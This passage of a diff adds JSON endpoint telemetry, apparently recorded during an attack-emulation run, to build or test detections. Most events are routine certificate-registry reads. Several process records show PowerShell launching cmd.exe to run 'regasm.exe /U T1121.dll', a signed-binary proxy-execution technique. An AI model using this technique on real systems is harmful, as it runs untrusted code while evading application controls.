"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6712, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": 
"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 6712, + "process_name": "RegAsm.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "subtype": "create", + "timestamp": 131883570861830000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}", + "unique_ppid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 